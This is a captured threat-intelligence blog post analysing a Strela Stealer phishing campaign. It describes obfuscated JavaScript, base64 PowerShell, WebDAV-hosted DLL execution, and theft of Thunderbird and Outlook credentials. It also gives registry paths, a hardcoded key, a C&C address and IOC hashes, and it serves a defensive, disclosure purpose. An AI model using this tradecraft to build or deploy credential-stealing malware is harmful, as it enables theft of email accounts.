cyble.com Open in urlscan Pro
192.0.78.152  Public Scan

URL: https://cyble.com/blog/strela-stealer-targets-europe-stealthily-via-webdav/
Submission: On November 07 via api from IN — Scanned from US

Form analysis 4 forms found in the DOM

POST https://wordpress.com/email-subscriptions

<form action="https://wordpress.com/email-subscriptions" method="post" accept-charset="utf-8" data-blog="221651828" data-post_access_level="everybody" data-subscriber_email="" id="subscribe-blog" data-hs-cf-bound="true" data-cb-wrapper="true">
  <div class="wp-block-jetpack-subscriptions__form-elements">
    <p id="subscribe-email">
      <label id="subscribe-field-label" for="subscribe-field" class="screen-reader-text"> Type your email… </label>
      <input required="required" type="email" name="email" class="no-border-radius  has-ast-global-color-6-border-color" style="font-size: 16px;padding: 10px 15px 10px 15px;border-color: ast-global-color-6;border-radius: 0px;border-width: 1px;"
        placeholder="Type your email…" value="" id="subscribe-field" title="Please fill in this field.">
    </p>
    <p id="subscribe-submit" style="width: ;max-width: 100%;">
      <input type="hidden" name="action" value="subscribe">
      <input type="hidden" name="blog_id" value="221651828">
      <input type="hidden" name="source" value="https://cyble.com/blog/strela-stealer-targets-europe-stealthily-via-webdav/">
      <input type="hidden" name="sub-type" value="subscribe-block">
      <input type="hidden" name="app_source" value="">
      <input type="hidden" name="redirect_fragment" value="subscribe-blog">
      <input type="hidden" name="lang" value="en_US">
      <input type="hidden" id="_wpnonce" name="_wpnonce" value="5c051a072f"><input type="hidden" name="_wp_http_referer" value="/blog/strela-stealer-targets-europe-stealthily-via-webdav/"><input type="hidden" name="post_id" value="70047"> <button
        type="submit" class="wp-block-button__link no-border-radius has-ast-global-color-6-border-color"
        style="background: #cc0000;width: 100%;font-size: 16px;padding: 10px 15px 10px 15px;margin: 0; margin-left: 10px;border-color: ast-global-color-6;border-radius: 0px;border-width: 1px;" name="jetpack_subscriptions_widget"> Subscribe Now <span
          class="jetpack-memberships-spinner"> <svg width="24" height="24" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
            <path d="M12,1A11,11,0,1,0,23,12,11,11,0,0,0,12,1Zm0,19a8,8,0,1,1,8-8A8,8,0,0,1,12,20Z" opacity=".25" fill="currentColor"></path>
            <path d="M10.14,1.16a11,11,0,0,0-9,8.92A1.59,1.59,0,0,0,2.46,12,1.52,1.52,0,0,0,4.11,10.7a8,8,0,0,1,6.66-6.61A1.42,1.42,0,0,0,12,2.69h0A1.57,1.57,0,0,0,10.14,1.16Z" class="jetpack-memberships-spinner-rotating" fill="currentColor"></path>
          </svg></span></button>
    </p>
  </div>
</form>

GET https://cyble.com/

<form class="search-form" action="https://cyble.com/" method="get" data-hs-cf-bound="true" data-cb-wrapper="true">
  <fieldset>
    <span class="text">
      <label for="search-field" class="screen-reader-text">Begin Search...</label>
      <input id="search-field" name="s" class="search-field" autocomplete="off" type="text" value="" placeholder="Begin Search..." tabindex="1">
    </span>
    <button aria-label="Search" id="search_submit" class="button search-submit" tabindex="2"><i class="astra-search-icon"> <span class="ast-icon icon-search"></span> </i></button>
  </fieldset>
</form>

POST https://wordpress.com/email-subscriptions

<form action="https://wordpress.com/email-subscriptions" method="post" accept-charset="utf-8" data-blog="221651828" data-post_access_level="everybody" data-subscriber_email="" id="subscribe-blog-2" data-hs-cf-bound="true" data-cb-wrapper="true">
  <div class="wp-block-jetpack-subscriptions__form-elements">
    <p id="subscribe-email">
      <label id="subscribe-field-2-label" for="subscribe-field-2" class="screen-reader-text"> Type your email… </label>
      <input required="required" type="email" name="email" style="font-size: 16px;padding: 15px 23px 15px 23px;border-radius: 50px;border-width: 1px;" placeholder="Type your email…" value="" id="subscribe-field-2" title="Please fill in this field.">
    </p>
    <p id="subscribe-submit">
      <input type="hidden" name="action" value="subscribe">
      <input type="hidden" name="blog_id" value="221651828">
      <input type="hidden" name="source" value="https://cyble.com/blog/strela-stealer-targets-europe-stealthily-via-webdav/">
      <input type="hidden" name="sub-type" value="subscribe-block">
      <input type="hidden" name="app_source" value="atomic-subscription-modal-lo">
      <input type="hidden" name="redirect_fragment" value="subscribe-blog-2">
      <input type="hidden" name="lang" value="en_US">
      <input type="hidden" id="_wpnonce" name="_wpnonce" value="5c051a072f"><input type="hidden" name="_wp_http_referer" value="/blog/strela-stealer-targets-europe-stealthily-via-webdav/"><input type="hidden" name="post_id" value="70047"> <button
        type="submit" class="wp-block-button__link" style="font-size: 16px;padding: 15px 23px 15px 23px;margin: 0; margin-left: 10px;border-radius: 50px;border-width: 1px;" name="jetpack_subscriptions_widget"> Subscribe <span
          class="jetpack-memberships-spinner"> <svg width="24" height="24" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
            <path d="M12,1A11,11,0,1,0,23,12,11,11,0,0,0,12,1Zm0,19a8,8,0,1,1,8-8A8,8,0,0,1,12,20Z" opacity=".25" fill="currentColor"></path>
            <path d="M10.14,1.16a11,11,0,0,0-9,8.92A1.59,1.59,0,0,0,2.46,12,1.52,1.52,0,0,0,4.11,10.7a8,8,0,0,1,6.66-6.61A1.42,1.42,0,0,0,12,2.69h0A1.57,1.57,0,0,0,10.14,1.16Z" class="jetpack-memberships-spinner-rotating" fill="currentColor"></path>
          </svg></span></button>
    </p>
  </div>
</form>

<form id="jp-carousel-comment-form" data-hs-cf-bound="true" data-cb-wrapper="true">
  <label for="jp-carousel-comment-form-comment-field" class="screen-reader-text">Write a Comment...</label>
  <textarea name="comment" class="jp-carousel-comment-form-field jp-carousel-comment-form-textarea" id="jp-carousel-comment-form-comment-field" placeholder="Write a Comment..."></textarea>
  <div id="jp-carousel-comment-form-submit-and-info-wrapper">
    <div id="jp-carousel-comment-form-commenting-as">
      <fieldset>
        <label for="jp-carousel-comment-form-email-field">Email</label>
        <input type="text" name="email" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-email-field">
      </fieldset>
      <fieldset>
        <label for="jp-carousel-comment-form-author-field">Name</label>
        <input type="text" name="author" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-author-field">
      </fieldset>
      <fieldset>
        <label for="jp-carousel-comment-form-url-field">Website</label>
        <input type="text" name="url" class="jp-carousel-comment-form-field jp-carousel-comment-form-text-field" id="jp-carousel-comment-form-url-field">
      </fieldset>
    </div>
    <input type="submit" name="submit" class="jp-carousel-comment-form-button" id="jp-carousel-comment-form-button-submit" value="Post Comment">
  </div>
</form>

Text Content

Check your External Threat Exposure Get Free Threat Assessment Report

Try Cyble Vision for 30 days with our Experts Schedule Free Demo

×
Skip to content
 * Google Fixes Critical Zero-Day Vulnerabilities in Latest Android Security
   Update

Switch to Cyble
Report an Incident
Talk to Sales
We are Hiring!
Login
Login
 * ProductsMenu Toggle
   * For Enterprises(B2B) and GovernmentsMenu Toggle
     * AI-Driven Cybersecurity Platforms
     * Cyble VisionFor Enterprises
       Award-winning cyber threat intelligence platform, designed to provide
       enhanced security through real-time intelligence and threat detection.
     * Cyble HawkFor Federal Bodies
       Protects sensitive information and assets from cyber threats with its
       specialized threat detection and intelligence capabilities built for
       federal bodies.
   * For Enterprises(B2B) and Individuals(B2C)Menu Toggle
     * AmIBreached
       Enables consumers and organizations to Identify, Prioritize and Mitigate
       darkweb risks.
     * Odin by CybleNew
       The most advanced internet-scanning tool in the industry for real-time
       threat detection and cybersecurity
     * The Cyber ExpressSubscribe
       #1 Trending Cyber Security News and Magazine
   * We’ve just released an update!
     Cyble has an update that enhances ASM, CTI and more...
     Menu Toggle
     * Schedule a Demo
 * SolutionsMenu Toggle
   * AI-Driven SolutionsPowered by AIMenu Toggle
     * Attack Surface Management
       Ensure digital security by identifying and mitigating threats with
       Cyble's Attack Surface Management
     * Brand Intelligence
       Comprehensive protection against online brand abuse, including brand
       impersonation, phishing, and fraudulent domains.
     * Cyber Threat Intelligence
       Gain insights and enhance your defense with AI-driven analysis and
       continuous threat monitoring
     * Dark Web Monitoring
       Stay vigilant and ahead of cybercriminals with Cyble's comprehensive Dark
       Web Monitoring.
     * Vulnerability Management
       
       Advanced scanning, risk evaluation, and efficient remediation strategies
       to protect against cyber threats.
     * Takedown and Disruption
       
       Fight cybercrime with Cyble’s top takedown services—remove fraud sites,
       content, and disrupt malicious campaigns.
   * Menu ItemMenu Toggle
     * Third Party Risk Management
       
       Identify and mitigate third-party risks to keep your business secure in
       external collaborations.
     * Digital Forensics & Incident Response
       
       Cyble offers comprehensive DFIR services to help businesses manage,
       mitigate, and recover from cyber incidents.
     * Physical Security Intelligence
       
       Monitor multiple locations on one platform with real-time alerts, AI
       insights, and tailored threat notifications for proactive security.
     * Executive Monitoring
       Protect your leadership with proactive threat detection, covering
       impersonations, PII leaks, and dark web monitoring with prompt alerts.
     * Cloud Security Posture Management (CSPM)
       Manage and secure cloud assets with Cyble’s CSPM, ensuring compliance and
       proactive risk detection across cloud and on-premises environments.
   * Solutions by Industry
     
     Menu Toggle
     * Healthcare & Pharmaceuticals
     * Financial Services
       
     * Retail and CPG
     * Technology Industry
     * Educational Platform
     * Solutions by Role
       
       Menu Toggle
       * Information Security
       * Corporate Security
       * Marketing
         
 * Why Cyble?Menu Toggle
   * Compare CybleMenu Toggle
     * Industry RecognitionAwards
     * Customer Stories
 * ResourcesMenu Toggle
   * Thought LeadershipMenu Toggle
     * Blog
       Discover the latest in cybersecurity with Cyble's blog, featuring a
       wealth of articles, research findings, and insights. CRIL is an
       invaluable resource for anyone interested in the evolving world of cyber
       threats and defenses, offering expert analysis and updates.
     * Knowledge Hub
     * Threat Actor Profiles
     * SAMA Compliance
     * Events
       Conferences, Webinars, Training sessions and more…
   * Data SheetsMenu Toggle
     * Case Studies
       Dive into Cyble's case studies to discover real-world applications of
       their cybersecurity solutions. These studies provide valuable insights
       into how Cyble addresses various cyber threats and enhances digital
       security for different organizations.
     * Research Reports
        * Country Reports
        * Industry Reports
        * Ransomware Reports
     
     * WhitepapersDownload
     * External Threat Assessment ReportDownload Report
   * Research ReportsLatest Report
     
     Menu Toggle
     * Free Tools
        * Scan The Dark Web
        * Scan The Internet
 * CompanyMenu Toggle
   * Our Story
     Learn about Cyble's journey and mission in the cybersecurity landscape.
     Menu Toggle
     * Leadership Team
       Meet our leadership team.
     * CareersWe are hiring!
       Explore a career with Cyble and contribute to cutting-edge cybersecurity
       solutions. Check out Cyble's career opportunities.
     * Press
 * PartnersMenu Toggle
   * Cyble Partner Network (CPN)Join Us
     Join Cyble's Partner Network to collaborate and innovate in cybersecurity.
     This platform offers unique opportunities for partnerships, fostering
     growth and shared success in tackling cyber threats together.
     Menu Toggle
     * Partner Login
     * Become a PartnerRegister
       Elevate your cybersecurity business with the Cyble Partner Network:
       Access cutting-edge tools, expert support, and growth opportunities.
       Ideal for MSSPs, resellers, and alliances.


Free Trial
Free Trial
Main Menu
 * ProductsMenu Toggle
   * For Enterprises(B2B) and GovernmentsMenu Toggle
     * AI-Driven Cybersecurity Platforms
     * Cyble VisionFor Enterprises
       Award-winning cyber threat intelligence platform, designed to provide
       enhanced security through real-time intelligence and threat detection.
     * Cyble HawkFor Federal Bodies
       Protects sensitive information and assets from cyber threats with its
       specialized threat detection and intelligence capabilities built for
       federal bodies.
   * For Enterprises(B2B) and Individuals(B2C)Menu Toggle
     * AmIBreached
       Enables consumers and organizations to Identify, Prioritize and Mitigate
       darkweb risks.
     * Odin by CybleNew
       The most advanced internet-scanning tool in the industry for real-time
       threat detection and cybersecurity
     * The Cyber ExpressSubscribe
       #1 Trending Cyber Security News and Magazine
   * We’ve just released an update!
     Cyble has an update that enhances ASM, CTI and more...
     Menu Toggle
     * Schedule a Demo
 * SolutionsMenu Toggle
   * AI-Driven SolutionsPowered by AIMenu Toggle
     * Attack Surface Management
       Ensure digital security by identifying and mitigating threats with
       Cyble's Attack Surface Management
     * Brand Intelligence
       Comprehensive protection against online brand abuse, including brand
       impersonation, phishing, and fraudulent domains.
     * Cyber Threat Intelligence
       Gain insights and enhance your defense with AI-driven analysis and
       continuous threat monitoring
     * Dark Web Monitoring
       Stay vigilant and ahead of cybercriminals with Cyble's comprehensive Dark
       Web Monitoring.
     * Vulnerability Management
       
       Advanced scanning, risk evaluation, and efficient remediation strategies
       to protect against cyber threats.
     * Takedown and Disruption
       
       Fight cybercrime with Cyble’s top takedown services—remove fraud sites,
       content, and disrupt malicious campaigns.
   * Menu ItemMenu Toggle
     * Third Party Risk Management
       
       Identify and mitigate third-party risks to keep your business secure in
       external collaborations.
     * Digital Forensics & Incident Response
       
       Cyble offers comprehensive DFIR services to help businesses manage,
       mitigate, and recover from cyber incidents.
     * Physical Security Intelligence
       
       Monitor multiple locations on one platform with real-time alerts, AI
       insights, and tailored threat notifications for proactive security.
     * Executive Monitoring
       Protect your leadership with proactive threat detection, covering
       impersonations, PII leaks, and dark web monitoring with prompt alerts.
     * Cloud Security Posture Management (CSPM)
       Manage and secure cloud assets with Cyble’s CSPM, ensuring compliance and
       proactive risk detection across cloud and on-premises environments.
   * Solutions by Industry
     
     Menu Toggle
     * Healthcare & Pharmaceuticals
     * Financial Services
       
     * Retail and CPG
     * Technology Industry
     * Educational Platform
     * Solutions by Role
       
       Menu Toggle
       * Information Security
       * Corporate Security
       * Marketing
         
 * Why Cyble?Menu Toggle
   * Compare CybleMenu Toggle
     * Industry RecognitionAwards
     * Customer Stories
 * ResourcesMenu Toggle
   * Thought LeadershipMenu Toggle
     * Blog
       Discover the latest in cybersecurity with Cyble's blog, featuring a
       wealth of articles, research findings, and insights. CRIL is an
       invaluable resource for anyone interested in the evolving world of cyber
       threats and defenses, offering expert analysis and updates.
     * Knowledge Hub
     * Threat Actor Profiles
     * SAMA Compliance
     * Events
       Conferences, Webinars, Training sessions and more…
   * Data SheetsMenu Toggle
     * Case Studies
       Dive into Cyble's case studies to discover real-world applications of
       their cybersecurity solutions. These studies provide valuable insights
       into how Cyble addresses various cyber threats and enhances digital
       security for different organizations.
     * Research Reports
        * Country Reports
        * Industry Reports
        * Ransomware Reports
     
     * WhitepapersDownload
     * External Threat Assessment ReportDownload Report
   * Research ReportsLatest Report
     
     Menu Toggle
     * Free Tools
        * Scan The Dark Web
        * Scan The Internet
 * CompanyMenu Toggle
   * Our Story
     Learn about Cyble's journey and mission in the cybersecurity landscape.
     Menu Toggle
     * Leadership Team
       Meet our leadership team.
     * CareersWe are hiring!
       Explore a career with Cyble and contribute to cutting-edge cybersecurity
       solutions. Check out Cyble's career opportunities.
     * Press
 * PartnersMenu Toggle
   * Cyble Partner Network (CPN)Join Us
     Join Cyble's Partner Network to collaborate and innovate in cybersecurity.
     This platform offers unique opportunities for partnerships, fostering
     growth and shared success in tackling cyber threats together.
     Menu Toggle
     * Partner Login
     * Become a PartnerRegister
       Elevate your cybersecurity business with the Cyble Partner Network:
       Access cutting-edge tools, expert support, and growth opportunities.
       Ideal for MSSPs, resellers, and alliances.


TRENDING

TARGETED INDUSTRIES -> IT & ITES | Government & LEA | Technology | Healthcare |
BFSITARGETED COUNTRIES -> United States | Russian Federation | China | United
Kingdom | GermanyTARGETED REGIONS -> North America (NA) | Europe & UK | Asia &
Pacific (APAC) | Middle East & Africa (MEA) | Australia and New Zealand
(ANZ)IOCs -> a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91 |
7bdbd180c081fa63ca94f9c22c457376 |
c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0 |
8c69830a50fb85d8a794fa46643493b2 | bbcf7a68f4164a9f5f5cb2d9f30d9790CVEs ->
CVE-2024-21887 | CVE-2023-46805 | CVE-2017-11882 | CVE-2024-21893 |
CVE-2021-44228TECHNIQUES -> T1082 | T1140 | T1486 | T1083 | T1105TACTICS ->
TA505 | TA0011 | TA0001 | TA0002 | TA0005TAGS -> security | the-cyber-express |
firewall-daily | the-cyber-express-news | malwareTHREAT ACTORS -> Lockbit |
Blackcat | Lazarus | VoltTyphoon | KimsukyMALWARE -> CobaltStrike | Qakbot |
Icedid | Trickbot | XmrigSOURCES -> Darkreading | The Cyber Express |
Bleepingcomputer | The Hacker News | Infosecurity Magazine

Home » Blog » Strela Stealer targets Central and Southwestern Europe through
Stealthy Execution via WebDAV


 * Infostealer, Malware

 * October 30, 2024


STRELA STEALER TARGETS CENTRAL AND SOUTHWESTERN EUROPE THROUGH STEALTHY
EXECUTION VIA WEBDAV

Cyble analyzes Strela Stealer’s stealthy phishing campaign targeting Central and
Southwestern Europe, using obfuscated JavaScript and WebDAV to deploy its
payload and steal sensitive credentials.


KEY TAKEAWAYS

 * The recent Strela Stealer phishing campaign, uncovered by Cyble Research and
   Intelligence Labs (CRIL), poses as an invoice notification to trick users
   into engaging with it.
 * This campaign predominantly targets users in Central and Southwestern
   European regions, adjusting its focus based on locale settings to maximize
   its reach within specific demographics.
 * Phishing emails carry ZIP file attachments containing heavily obfuscated
   JavaScript (.js) files, which are designed to evade detection by security
   tools.
 * The JavaScript file conceals a base64-encoded PowerShell command that, when
   executed, launches a malicious payload directly from the WebDAV server
   without saving the file to disk.
 * The payload, Strela Stealer, is embedded within an obfuscated DLL file,
   specifically targeting systems in Germany and Spain.
 * Strela Stealer is programmed to steal sensitive email configuration details,
   such as server information, usernames, and passwords.
 * In addition to stealing credentials, Strela Stealer gathers detailed system
   information, enabling attackers to conduct reconnaissance and potentially
   launch further targeted actions on compromised systems.


EXECUTIVE SUMMARY

Strela Stealer, first identified by DCSO in late 2022, is a type of
information-stealing malware primarily designed to exfiltrate email account
credentials from widely used email clients, including Microsoft Outlook and
Mozilla Thunderbird. This malware initially targeted Spanish-speaking users
through spam email campaigns containing malicious ISO attachments, which
included a .lnk file and a polyglot file. When executed, the .lnk file triggered
the polyglot file, executing both the lure html and Strela stealer DLL using
“rundll32.exe”.

The Threat Actors (TAs) then evolved their tactics by using spear-phishing
emails with ZIP file attachments, as identified by Palo Alto. When users
downloaded and extracted the archive, a JavaScript file was saved onto their
system. Executing the JavaScript file dropped a Base64-encoded file and a batch
file. The Base64 file was then decoded using the “certutil -f decode” command,
creating a DLL that was executed using “rundll32.exe” with the exported function
“hello.“

In their latest campaign, the TAs are using spear-phishing emails with ZIP file
attachments containing obfuscated JavaScript code intended to run through
WScript. This JavaScript code executes a base64-encoded PowerShell command,
which executes the final malicious DLL from a WebDAV server using “rundll32.exe”
via the exported function “Entry.” By using this method, the malicious DLL file
is not saved on the disk, allowing it to evade detection by security products.




TECHNICAL DETAILS:

The Strela Stealer campaign begins with a carefully crafted phishing email
written in German, with a theme designed to resemble an invoice for a recent
product purchase. The email aims to encourage recipients to open the attached
ZIP file RG_175_133572_7063403.zip under the pretense of verifying or processing
a transaction. The figure below shows one of the phishing emails.

Figure 1 – Phishing Email



Inside the ZIP file named “RG_175_133572_7063403.zip,” there is a highly
obfuscated JavaScript file named “1819737872954318698.js.” This JavaScript file
employs advanced obfuscation techniques, using string substitution to generate
and execute its hidden code. When triggered, it runs through Windows Script Host
(wscript), which then initiates a PowerShell command embedded within the script.

Technical Content! Subscribe to Unlock


Sign up and get access to Cyble Research and Intelligence Labs' exclusive
contents


Email
Country
Phone
Unlock this Content


The PowerShell command further contains a base64-encoded payload. Once decoded
and executed, this encoded command reaches out to a WebDAV server and executes a
malicious DLL file named “96492217114973.dll” on the target system, allowing
Strela Stealer to embed itself and begin its data-theft operations. The figure
below shows the de-obfuscated JavaScript code.

Your browser does not support the video tag.
Figure 2 – JavaScript File



The DLL file acts as a loader for the main payload and includes only a single
export function named “Entry”. The DLL includes numerous conditional jump
instructions, making analysis more challenging and potentially causing the
disassembler to crash. Furthermore, several functionalities may not work
properly in the debugger with default settings due to the extensive branching
and conditions. The figure below shows the IDA graph view.

Figure 3 – IDA graph view



Upon execution, the DLL accesses a hardcoded key within its “.data” section, as
shown in Figure 5. This key is used to decrypt additional data stored in the
same section, ultimately extracting the main executable payload.

Figure 4 – Key present in DLL file



The code below demonstrates the use of XOR and other arithmetic operations for
decryption.

Figure 5 – Decrypting the MZ header



The image below displays the decrypted MZ content.

Figure 6 – MZ Header



The resulting MZ file runs directly from the “rundll32.exe” process. For
analysis, we extracted this payload and examined it separately, identifying it
as Sterla Stealer, a malware active since April 2022.

Here we compared the previous version of Sterla Stealer with the new one.

Campaign Identified in 2022Campaign Identified in March 2024Latest CampaignNo
code obfuscationEmployed control flow obfuscationEmployed control flow
obfuscationNo decryption of PE file from DLL fileDecrypts a memory mapped PE
fileDecrypts a memory mapped PE filestrela, server.php, key4.db, and login.json
strings present in the decrypted PE filestrela, server.php, key4.db, and
login.json strings present in the decrypted PE fileStrela string is removedPDB
path is presentNo PDB pathNo PDB pathExport function name: StrelaExport function
name: helloExport function name: EntryDrops payload from ISODrops payload from
ZIPExecutes payload from WebDAV Server

While the Strela stealer is running, it hides its window by calling the
“ShowWindow” Win32 API with the “SW_HIDE” parameter for the current process. It
then creates a thread to display a fake error message, as shown below.

Figure 7 – Fake error message



Next, the stealer obtains the locale settings from the victim’s machine by
utilizing the GetKeyboardLayout API and comparing the results to the specific
hardcoded Language identifiers mentioned below.

 * 0407 – German (Germany)
 * 0C0A – Spanish (Spain)
 * 042D – Basque (Spain)

If any of these language identifiers match, the stealer continues its execution;
if not, it stops. This behavior indicates that the malware specifically targets
regions within Germany and Spain.

Figure 8 – Locale Check




TARGETING THUNDERBIRD

The malware scans for Thunderbird profiles and collects “logins.json” and
“key4.db” files from all profiles found on the system. These files contain
sensitive information, including usernames, passwords, and other email
configuration details. Once obtained, the data within these files is encrypted
using a custom encryption method with a hardcoded key,
“96be98b2-8a00-410d-87da-2482cc8b7793”, and then sent to the TAs command and
control (C&C) server at “94.159.113.48” via a POST request. Following the data
transmission, the malware expects the response “ANTIROK” from the C&C server and
continues to resend the encrypted data using the same encryption method until
this response is received.

Figure 9 – Targeting Thunderbird profiles




TARGETING OUTLOOK

To steal Outlook information, the malware examines specific registry keys to
retrieve IMAP server details, usernames, and passwords, which are typically
stored in encrypted form. It accesses the following registry paths:

 * Software\\Microsoft\\Windows Messaging
   Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676
 * Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging
   Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676
 * SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\

Using the “CryptUnprotectData” Win32 API, it decrypts these details into plain
text. After decryption, the malware applies custom encryption using the same
hardcoded key as in the Thunderbird case and an XOR operation before sending the
encrypted data to the threat actor’s command-and-control (C&C) server.


GATHERING SYSTEM INFORMATION

Continuing its data gathering, the malware executes the “systeminfo” command,
saving the output as a text file within the Temp directory. This file is then
exfiltrated to the TA’s C&C server using the previously mentioned encryption
technique.

Figure 10 – Gathering systeminfo



In some cases, if the response “ANTIROK” is not received from the C&C server,
the stealer attempts to re-encrypt the existing encrypted content using the same
method. This results in the transmission of the actual data without encryption,
as illustrated in the figure below.

Figure 11 – Data Exfiltration



In its final steps, the malware utilizes a COM object to navigate through the
system’s “SpecialFolders” paths, collecting filenames from each directory. This
data is compiled into a single output and sent to the attacker’s C2 server. By
gathering information on files stored in sensitive locations, the malware
enables the TA to perform reconnaissance, potentially planning further data
exfiltration or deploying additional malicious activities based on the obtained
directory structure.


CONCLUSION

The recent iterations of the Strela Stealer campaign reveal a notable
advancement in malware delivery techniques, highlighting increased
sophistication and stealth. By employing spear-phishing emails that contain ZIP
file attachments, the malware successfully circumvents conventional security
defenses. The use of heavily obfuscated JavaScript, along with base64-encoded
PowerShell commands, significantly complicates detection and response efforts.
Additionally, executing the DLL file directly from the WebDAV server without
saving it to disk effectively bypasses security mechanisms, enabling
unauthorized access to sensitive information. This evolution underscores the
importance of proactive cybersecurity measures to counter such advanced threats.


CYBLE’S THREAT HUNTING PACKAGES

At Cyble, we understand the evolving landscape of cyber threats and the need for
robust security measures. Our Threat Hunting Packages are specifically designed
to detect suspicious remote WebDAV share access and file execution activities,
such as those employed by the Strela Stealer malware.

In addition to our sophisticated detection capabilities, our Threat Hunting
Packages include custom YARA rules tailored to identify signatures associated
with Strela Stealer. These rules enhance the Organization’s security posture by
enabling quick detection of known threats, ensuring that systems remain
protected against sophisticated malware tactics.

For further details on this threat and several others being constantly analyzed
by Cyble Research and Intelligence Labs, schedule a demo today.


RECOMMENDATIONS

 * Conduct regular training sessions to educate employees about phishing
   tactics, including recognizing suspicious emails and attachments.
 * Deploy robust endpoint protection solutions that can detect and respond to
   malicious activity, including obfuscated scripts and unauthorized file
   executions.
 * Implement strict access controls on WebDAV servers, ensuring only authorized
   users have access. Disable WebDAV if it is not required for business
   operations to minimize potential attack vectors.
 * Limit the execution of PowerShell scripts and other scripting languages on
   endpoints unless necessary for business operations.
 * Develop and regularly update an incident response plan that includes specific
   procedures for handling phishing attacks and malware infections.
 * Implement multi-factor authentication for accessing sensitive systems and
   accounts, adding an additional layer of security against credential theft.


MITRE ATT&CK® TECHNIQUES

TacticTechniqueProcedureInitial Access (TA0001)Phishing (T1566)The campaign
starts with spear-phishing emails containing ZIP file attachments.Execution
(TA0002)User Execution (T1203)The obfuscated JavaScript code executes via
WScript, running PowerShell commands.Execution (TA0002)Command and Scripting
Interpreter (T1059)PowerShell commands are triggered to execute the final
payload.Credential Access (TA0006)Credential Dumping (T1003)The malware
retrieves usernames and passwords from Thunderbird and Outlook
profiles.Discovery (TA0007)System Information Discovery (T1082)Executes
systeminfo to gather system details and save it as a text file.Discovery
(TA0007)File and Directory Discovery (T1083)Collects filenames from system
directories using COM objects.Command and Control (TA0011)Application Layer
Protocol (T1071)The encrypted data is sent to the C&C server via HTTP POST
requests.Exfiltration (TA0010)Exfiltration Over Command and Control Channel
(T1041)The stolen data, including login credentials, is exfiltrated to the TA’s
server.


INDICATORS OF COMPROMISE

IndicatorsIndicator
TypeDescriptiondcd7dd2aaef3e87b467ce4e4682a63d2d01da20e31fada494435ae8a921c09aeSHA256Email75d996a0a5262bff134d7a752efd1fb6325bc2ce347b084967e06725008180f9SHA256Emailc5279ff9c215afbd5c54793c6fc36c80d2cefb0342a1471581b15e43bd4a9b08SHA256Emailbe76ab2054ef174331abfef53825254ac26bfc9657dca9c3767a5e5daf7bec1eSHA256Email4e38abd0fef9a4b3f4cbc674601bc10766d4db588cb83d3e5fb50ec573c372cdSHA256Email08007bc4c3711990eddd7cb342d176f470298027d923589206e4c9212cc95ba3SHA256JavaScript12cd832efcd3e3a6938ca5d445f572731b64866afc0129219d8110030aa22242SHA256JavaScript150f490ae97098342e192a6722872e86d468cbd2fd8b3d6c46f4601acdea85d1SHA256JavaScript154daf225df559d44d066027a5179aa68ebd9ce046787faa84bd3c230ad3fd08SHA256JavaScript16ae254deaa02b0acf5beda73cb178eb5c50e50b8d1752841ae8148b28354585SHA256JavaScript1a60dd873e71c926ede3bc395e45e10062f063a374f05e7ff6721b6e35706ec5SHA256JavaScript1f3b7fb2ec7e3f292a9d5fab2e263c777c4273af872673d324d580387a5f3236SHA256JavaScript22d34569742fc22c109f65a2edc8ef264c44f61e20014ac27160931acfba296cSHA256JavaScript294c66460c3b0da83a3ed894bd1fb8a7fc5fed2b8fb3f6adb555d4b558371f00SHA256JavaScript2c447b38bc71b6b68234e3f7ea389807a9d61597aab5a11cc60133ee01fb7b79SHA256JavaScript3078f89fa189af1fc8d9b76ab03e2ae34de080072057d5630f8d829c18e0b29bSHA256JavaScript32b8f94f5f7f359a3ef758a8de8ed554c7e5dec2b75f9a65461167eaa874cd00SHA256JavaScript34e9df65677f7e89fd3514103d9a75f7fb526485f1c8fa3bf82fe8896991683aSHA256JavaScript34fdf466af7288f0b458daaca9eb76be88e182ae1b2eadb3281371c2d6726bc3SHA256JavaScript36a0751216fc7f90559abb10dcec2c1153e70c9d4da4d06a0a206ec2e726b92fSHA256JavaScript37984a476fdeda094cdb82957a5aa0d2835527c4f403775d5e0182c64cb1a7fbSHA256JavaScript3c09514e197004d822fd26798372cd7dc30ddcc7fe5585a8a13475319f57e7deSHA256JavaScript3fe89e89556c0210bfb5094a524b1f81c87cde6b6bb2320abbe61d68ac6c4a4bSHA256JavaScript404341b290e56b21c74d5768a98580813f5e81a5ef2e97e1af7aec6cb2a719b0SHA256JavaScript4781f4c8a8a43b559d1c1452e0e967cd23f7fd3d41a1065e5a3ec3366e3bf496SHA256JavaScript4a2317a78749539a8bf0d1e134bd68f64a5e956dee9a12157028969949bb29c4SHA256JavaScript4eaf2d0023d9531ee9e0d3958014260d95b817af5e74b9c6819f371a1a5af753SHA256JavaScript50c9bd0f5deca0b2edbc4128aa7895ec0268a246e536110efe81e3a3da696b0cSHA256JavaScript540492ee7e2e3a0036bc34ff47519a17ad6a8300319b1ff9a1d1a210333cb46dSHA256JavaScript58b0ae24a7f325b8c3acd001b4bdff35fc7e440a0bb910750e019a2657de0822SHA256JavaScript59894ed00aaa9f8ab743ea09a1c7add38b7bf378b073aea978fb1703ea9aacddSHA256JavaScript59c8dcd99af398b149bfd80b921e1b06f97e8cc6908d806b174341efb899d647SHA256JavaScript5a3633e0aad62b5ca063e3ffb15a2bbcdf7138f82113299b53f8194525cb32a3SHA256JavaScript5b296616d0cd44147e84e638dffed68d07b305bcee60601147bf41cb01e8c038SHA256JavaScript5c3a86bd9fb12cad7a98041d1ff35ac739b41a9e43abc525c4e96d61be6f9565SHA256JavaScript6044ea92d233b14cc6422e1cea8ee7ea8e241812f3e780f57f096101e5917f8aSHA256JavaScript662a2a870928dc42d9cd04dbbb7a948300c98496bf4f68aa7ce1320d93da3180SHA256JavaScript666060f975e34e610bea2a3e2a6c8bad58506bee6acfbaefd2c02e563736351fSHA256JavaScript67e95381a8d220063ea1a44e75bc9c9c2e0d973fb991c0ce92a798a1bfe23c1dSHA256JavaScript680ea9c726dbfb